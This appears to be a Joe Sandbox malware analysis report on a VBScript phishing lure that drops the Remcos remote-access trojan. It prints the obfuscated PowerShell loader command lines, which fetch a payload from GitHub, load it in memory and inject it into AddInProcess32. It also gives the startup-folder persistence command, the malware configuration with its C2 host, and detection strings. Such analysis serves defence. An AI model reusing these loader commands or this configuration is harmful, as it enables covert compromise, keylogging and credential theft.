Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT SPECIFIKACIJA 364846637-pdf.vbs

Overview

General Information

Sample name:PAYMENT SPECIFIKACIJA 364846637-pdf.vbs
Analysis ID:1528047
MD5:c2159c210774b7d3e8f6d5853a925b5b
SHA1:18d3bd92eb0417f28d62623e8b8dea7c49450637
SHA256:47c24878118ddd94cef739adfd6af0572750e7e4f0f8ec5294d0900123c3ceff
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5664 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2260 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1816 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 6200 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 5508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 6308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "ab9001.ddns.net:35890:1", "Assigned name": "NEWS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "vlc.exe", "Startup value": "reg", "Hide file": "Disable", "Mutex": "Rmc-YJH0WY", "Keylog flag": "1", "Keylog path": "User Profile", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.3435406338.00000000012DB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000B.00000002.3435406338.00000000012C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000002.3436141535.0000000002DDF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x691e0:$a1: Remcos restarted by watchdog!
            • 0x69738:$a3: %02i:%02i:%02i:%03i
            • 0x69abd:$a4: * Remcos v
            Click to see the 12 entries
            SourceRuleDescriptionAuthorStrings
            8.2.powershell.exe.20011562480.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              8.2.powershell.exe.20011562480.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x661e0:$a1: Remcos restarted by watchdog!
              • 0x66738:$a3: %02i:%02i:%02i:%03i
              • 0x66abd:$a4: * Remcos v
              8.2.powershell.exe.20011562480.0.unpackREMCOS_RAT_variantsunknownunknown
              • 0x611e4:$str_a1: C:\Windows\System32\cmd.exe
              • 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6020c:$str_b2: Executing file:
              • 0x61328:$str_b3: GetDirectListeningPort
              • 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x60e30:$str_b7: \update.vbs
              • 0x60234:$str_b9: Downloaded file:
              • 0x60220:$str_b10: Downloading file:
              • 0x602c4:$str_b12: Failed to upload file:
              • 0x612f0:$str_b13: StartForward
              • 0x61310:$str_b14: StopForward
              • 0x60dd8:$str_b15: fso.DeleteFile "
              • 0x60d6c:$str_b16: On Error Resume Next
              • 0x60e08:$str_b17: fso.DeleteFolder "
              • 0x602b4:$str_b18: Uploaded file:
              • 0x60274:$str_b19: Unable to delete:
              • 0x60da0:$str_b20: while fso.FileExists("
              • 0x60749:$str_c0: [Firefox StoredLogins not found]
              8.2.powershell.exe.20011562480.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
              • 0x60100:$s1: \Classes\mscfile\shell\open\command
              • 0x60160:$s1: \Classes\mscfile\shell\open\command
              • 0x60148:$s2: eventvwr.exe
              11.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                Click to see the 10 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.e
                Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2V
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2V
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5